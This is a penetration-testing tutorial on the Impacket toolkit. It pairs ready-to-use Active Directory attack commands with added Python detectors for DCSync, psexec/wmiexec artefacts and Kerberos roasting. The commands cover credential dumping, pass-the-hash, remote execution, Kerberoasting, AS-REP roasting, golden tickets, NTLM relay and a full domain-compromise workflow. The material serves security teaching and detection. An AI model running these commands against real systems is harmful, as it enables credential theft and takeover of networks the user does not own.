Impacket is a collection of Python classes for working with network protocols. Created by SecureAuth and now maintained as an open-source project at github.com/fortra/impacket, it provides implementations of SMB, MSRPC, NTLM, Kerberos, LDAP, and dozens of other Windows protocols at the raw packet level. For penetration testers targeting Windows environments and Active Directory, Impacket’s included scripts are indispensable — they can dump credentials, execute commands, perform Pass-the-Hash attacks, Kerberoast, and much more.
This guide covers the most important Impacket scripts with real usage examples.
Installing Impacket
Impacket is preinstalled on Kali Linux. To install or update manually:
pip3 install impacket
Or install the latest development version:
git clone https://github.com/fortra/impacket.git
cd impacket
pip3 install .
Scripts are typically located at /usr/share/doc/python3-impacket/examples/ on Kali, or wherever pip installs them (usually in your PATH after pip install).
secretsdump.py — Dumping Credentials
secretsdump.py is one of the most powerful tools in the Impacket suite. It can dump:
- SAM database (local account hashes)
- NTDS.dit (domain controller hashes)
- LSA secrets
- DPAPI masterkeys
- Cached credentials
Remote SAM Dump (Over SMB)
secretsdump.py domain/username:password@192.168.1.100
Domain Controller Dump (DCSync)
DCSync pulls the directory's password data over the DC replication protocol (DRSUAPI) instead of copying NTDS.dit from disk, so the DC's filesystem is never touched:
secretsdump.py -just-dc domain/username:password@dc01.domain.local
Pass-the-Hash with secretsdump
If you have an NTLM hash instead of a cleartext password:
secretsdump.py -hashes :aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88885d6df0b16 \
domain/administrator@192.168.1.100
The format is -hashes LMhash:NThash. If no LM hash is available, leave the LM part empty (as in -hashes :NThash) or use the empty-password LM hash aad3b435b51404eeaad3b435b51404ee, as in the example above.
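On the defensive side, the replication that secretsdump.py -just-dc performs is auditable. The following is an added example (not Impacket's own code) that flags DCSync-style access in Security event 4662; the event field names and the sample events are constructed, and the DC account list is an assumption you would fill from your own domain.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662.

Added example, not part of the Impacket project. secretsdump.py -just-dc asks
the DC to replicate directory data, which needs the control-access rights
DS-Replication-Get-Changes and DS-Replication-Get-Changes-All. With directory
service access auditing enabled the DC logs that as event 4662, with the
right's GUID in the Properties field. Only DC computer accounts (plus any known
sync account, e.g. for Azure AD Connect) should ever exercise these rights.
"""
import json

# Control-access right GUIDs as they appear, braced, in the 4662 Properties field.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}

def detect_dcsync(event_lines, allowed_accounts):
    """Return (ACCOUNT, right) pairs for replication access by accounts not in allowed_accounts (upper-case)."""
    alerts = []
    for line in event_lines:  # one SIEM-style JSON event per line
        ev = json.loads(line)
        if ev.get("EventID") != 4662:
            continue
        account = ev.get("SubjectUserName", "").upper()
        props = ev.get("Properties", "").lower()
        for guid, right in REPLICATION_RIGHTS.items():
            if guid in props and account not in allowed_accounts:
                alerts.append((account, right))
    return alerts

# Constructed sample events for a hypothetical domain. DC01$ replicating is
# normal; a user account exercising both rights looks like secretsdump -just-dc.
SAMPLE_EVENTS = [
    '{"EventID": 4662, "SubjectUserName": "DC01$", "ObjectType": "domainDNS", '
    '"Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}',
    '{"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": "domainDNS", '
    '"Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}',
    '{"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": "domainDNS", '
    '"Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    '{"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": "user", '
    '"Properties": "Control Access {00299570-246d-11d0-a768-00aa006e0529}"}',  # unrelated right
]

if __name__ == "__main__":
    for account, right in detect_dcsync(SAMPLE_EVENTS, {"DC01$", "DC02$"}):
        print(f"DCSync suspect: {account} exercised {right}")
```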
psexec.py — Remote Command Execution
psexec.py provides a PsExec-like shell over SMB, executing commands via a service binary uploaded to the target:
psexec.py domain/administrator:password@192.168.1.100
With Pass-the-Hash:
psexec.py -hashes :32ed87bdb5fdc5e9cba88885d6df0b16 administrator@192.168.1.100
This drops you into a SYSTEM-level shell if the credentials are valid.
wmiexec.py — Stealthier Command Execution
wmiexec.py executes commands through WMI instead of creating a service, leaving fewer artifacts:
wmiexec.py domain/administrator:password@192.168.1.100
Execute a single command without an interactive shell:
wmiexec.py domain/administrator:password@192.168.1.100 "whoami"
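Both execution methods above leave recognisable host artefacts. The following is an added example (not Impacket's own code) that matches those default-configuration traces in System event 7045 and Sysmon event 1; the telemetry field names, the host WS01 and the sample events are constructed.

```python
"""Spot psexec.py and wmiexec.py execution artefacts in endpoint telemetry.

Added example, not part of the Impacket project. By default psexec.py installs
a service with a random four-letter name whose ImagePath is an executable it
just uploaded directly under %SystemRoot% (System log event 7045). wmiexec.py
runs "cmd.exe /Q /c <command>" as a child of WmiPrvSE.exe and redirects output
to a file named __<timestamp> on the ADMIN$ share of 127.0.0.1 (Sysmon event 1).
Operators can rename both, so these are default-config indicators, not proof.
"""
import json
import re

# psexec.py defaults: 4 ASCII letters for the service, <letters>.exe right under the Windows root.
PSEXEC_SERVICE = re.compile(r"^[A-Za-z]{4}$")
PSEXEC_IMAGE = re.compile(r"^(?:%systemroot%|[A-Za-z]:\\Windows)\\[A-Za-z]+\.exe$", re.I)
# wmiexec.py default output redirection target on the loopback ADMIN$ share.
WMIEXEC_OUTPUT = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+", re.I)

def classify(ev):
    """Return 'psexec', 'wmiexec' or None for one parsed event dict."""
    if ev.get("EventID") == 7045:
        if PSEXEC_SERVICE.match(ev.get("ServiceName", "")) and PSEXEC_IMAGE.match(ev.get("ImagePath", "")):
            return "psexec"
    elif ev.get("EventID") == 1:  # Sysmon process creation
        parent = ev.get("ParentImage", "").lower()
        if parent.endswith("wmiprvse.exe") and WMIEXEC_OUTPUT.search(ev.get("CommandLine", "")):
            return "wmiexec"
    return None

def scan(lines):
    """Return [(host, verdict)] for each JSON event line that matches a pattern."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        verdict = classify(ev)
        if verdict:
            hits.append((ev.get("Computer", "?"), verdict))
    return hits

# Constructed sample telemetry for a hypothetical host WS01. Raw strings keep the
# JSON escaping readable: "\\" in the line is one backslash after decoding.
SAMPLE = [
    r'{"EventID": 7045, "Computer": "WS01", "ServiceName": "kQzT", "ImagePath": "%systemroot%\\aBcDeFgH.exe"}',
    r'{"EventID": 7045, "Computer": "WS01", "ServiceName": "Spooler", "ImagePath": "C:\\Windows\\System32\\spoolsv.exe"}',
    r'{"EventID": 1, "Computer": "WS01", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",'
    r' "CommandLine": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1700000000.12 2>&1"}',
    r'{"EventID": 1, "Computer": "WS01", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe /c whoami"}',
]
```

Calling scan(SAMPLE) yields one psexec and one wmiexec verdict for WS01; the Spooler service and the explorer-launched cmd.exe are left alone.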
smbexec.py — SMB-Based Execution
smbexec.py is another execution method, useful when psexec is blocked:
smbexec.py domain/administrator:password@192.168.1.100
atexec.py — Task Scheduler Execution
Execute commands via the Windows Task Scheduler:
atexec.py domain/administrator:password@192.168.1.100 "whoami"
GetSPNs.py — Kerberoasting
Kerberoasting extracts Kerberos TGS tickets for service accounts and cracks them offline. Any domain user can request TGS tickets for any SPN:
GetSPNs.py -dc-ip 192.168.1.10 domain.local/username:password -request
Output hashes in Hashcat format:
GetSPNs.py -dc-ip 192.168.1.10 domain.local/username:password \
-request -outputfile kerberoast_hashes.txt
Then crack with Hashcat:
hashcat -m 13100 kerberoast_hashes.txt rockyou.txt -r best64.rule
GetNPUsers.py — AS-REP Roasting
AS-REP Roasting targets accounts with “Do not require Kerberos pre-authentication” enabled. The KDC returns an AS-REP that can be cracked offline:
GetNPUsers.py domain.local/ -usersfile users.txt -no-pass -dc-ip 192.168.1.10 -outputfile asrep_hashes.txt
With valid credentials to auto-discover vulnerable accounts:
GetNPUsers.py domain.local/username:password -request -dc-ip 192.168.1.10 -outputfile asrep_hashes.txt
Crack with Hashcat:
hashcat -m 18200 asrep_hashes.txt rockyou.txt
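Both Kerberos attacks above (Kerberoasting and AS-REP roasting) are visible in the domain controller's Kerberos audit events. The following is an added example (not Impacket's own code) that applies the two detection rules to constructed 4769/4768 events; the field names, users and thresholds are assumptions, and the events are represented as dicts as a SIEM would hand them over.

```python
"""Flag Kerberoasting and AS-REP roasting in DC Kerberos audit events.

Added example, not part of the Impacket project. GetUserSPNs.py -request asks
the KDC for a service ticket for every SPN-bearing account, normally RC4-HMAC
(encryption type 0x17, the hashcat 13100 format); each one is logged as event
4769. GetNPUsers.py makes the KDC answer AS-REQs for accounts that need no
pre-authentication, logged as event 4768 with Pre-Authentication Type 0. One
principal collecting RC4 tickets for many distinct services in a short window
is the Kerberoasting signal; a PreAuthType 0 success names a roastable account.
"""
from collections import defaultdict

RC4_HMAC = "0x17"

def detect_kerberoast(events, min_services=3, window_s=300):
    """Return users that got RC4 TGS for >= min_services distinct services inside window_s seconds."""
    per_user = defaultdict(list)  # user -> [(epoch_seconds, service)]
    for ev in events:
        if ev["EventID"] != 4769 or ev["TicketEncryptionType"].lower() != RC4_HMAC:
            continue
        svc = ev["ServiceName"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):  # TGT renewals and machine SPNs are not roast targets
            continue
        per_user[ev["TargetUserName"]].append((ev["Time"], svc))
    flagged = []
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # sliding window anchored at each request
            if len({s for t, s in reqs[i:] if t - t0 <= window_s}) >= min_services:
                flagged.append(user)
                break
    return flagged

def detect_asrep_roast(events):
    """Return (user, client IP) for AS-REQs the KDC answered without pre-authentication."""
    return [(ev["TargetUserName"], ev["IpAddress"]) for ev in events
            if ev["EventID"] == 4768 and str(ev.get("PreAuthType")) == "0"]

# Constructed sample events for a hypothetical domain (Time is epoch seconds).
SAMPLE = [
    {"EventID": 4769, "Time": 100, "TargetUserName": "jdoe", "ServiceName": "svc-sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": 101, "TargetUserName": "jdoe", "ServiceName": "svc-web", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": 103, "TargetUserName": "jdoe", "ServiceName": "svc-backup", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": 104, "TargetUserName": "jdoe", "ServiceName": "WS01$", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": 200, "TargetUserName": "asmith", "ServiceName": "svc-sql", "TicketEncryptionType": "0x12"},
    {"EventID": 4768, "Time": 300, "TargetUserName": "svc-legacy", "IpAddress": "10.0.0.25", "PreAuthType": 0},
    {"EventID": 4768, "Time": 301, "TargetUserName": "jdoe", "IpAddress": "10.0.0.25", "PreAuthType": 2},
]
```

On this sample, detect_kerberoast(SAMPLE) names only jdoe (three distinct RC4 service tickets within 300 seconds, the machine account excluded) and detect_asrep_roast(SAMPLE) names svc-legacy; asmith's AES ticket request is ignored.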
GetUserSPNs.py vs GetSPNs.py
These are effectively the same script under different names depending on the version. Both perform Kerberoasting — use whichever is on your system.
smbclient.py — SMB File Operations
Interact with SMB shares for file enumeration and transfer:
smbclient.py domain/username:password@192.168.1.100
This gives you an interactive shell to list shares, download files, and upload tools:
# smb: \> shares
# smb: \> use C$
# smb: \C$\> ls
# smb: \C$\> get Windows\System32\config\SAM
lookupsid.py — SID Brute-Forcing
Enumerate domain users and groups by brute-forcing SIDs:
lookupsid.py domain/username:password@192.168.1.10
This is useful for user enumeration when other methods are blocked.
samrdump.py — SAMR Enumeration
Enumerate domain users via SAMR without authentication (if the server allows it):
samrdump.py 192.168.1.10
With credentials:
samrdump.py domain/username:password@192.168.1.10
ticketer.py — Golden and Silver Ticket Attacks
Create Kerberos Golden Tickets (requires the KRBTGT hash):
ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid S-1-5-21-... \
-domain domain.local Administrator
Load the ticket into the current session:
export KRB5CCNAME=Administrator.ccache
secretsdump.py -k -no-pass dc01.domain.local
ntlmrelayx.py — NTLM Relay Attacks
ntlmrelayx.py captures and relays NTLM authentication to other hosts, enabling credential capture without cracking:
ntlmrelayx.py -tf targets.txt -smb2support
Combine with Responder to capture NTLM hashes from the network:
# Terminal 1 - Responder (with its SMB and HTTP servers turned off in Responder.conf, so those connections reach the relay instead)
responder -I eth0 -P -d -b
# Terminal 2 - Relay to targets
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
Common Impacket Workflow in AD Pentesting
A typical Active Directory engagement with Impacket follows this progression:
- Enumerate users with samrdump.py or lookupsid.py
- AS-REP Roast non-pre-auth accounts with GetNPUsers.py
- Kerberoast service accounts with GetSPNs.py
- Crack hashes offline with Hashcat
- Move laterally with wmiexec.py or psexec.py
- Dump credentials with secretsdump.py
- DCSync the entire domain once you have DA credentials
Summary
Impacket is the backbone of Windows and Active Directory penetration testing. Its Python-based protocol implementations work reliably across diverse environments without requiring a Windows machine. Mastering secretsdump, the Kerberos attack scripts, and the remote execution tools gives you a comprehensive toolkit for every phase of an internal network assessment.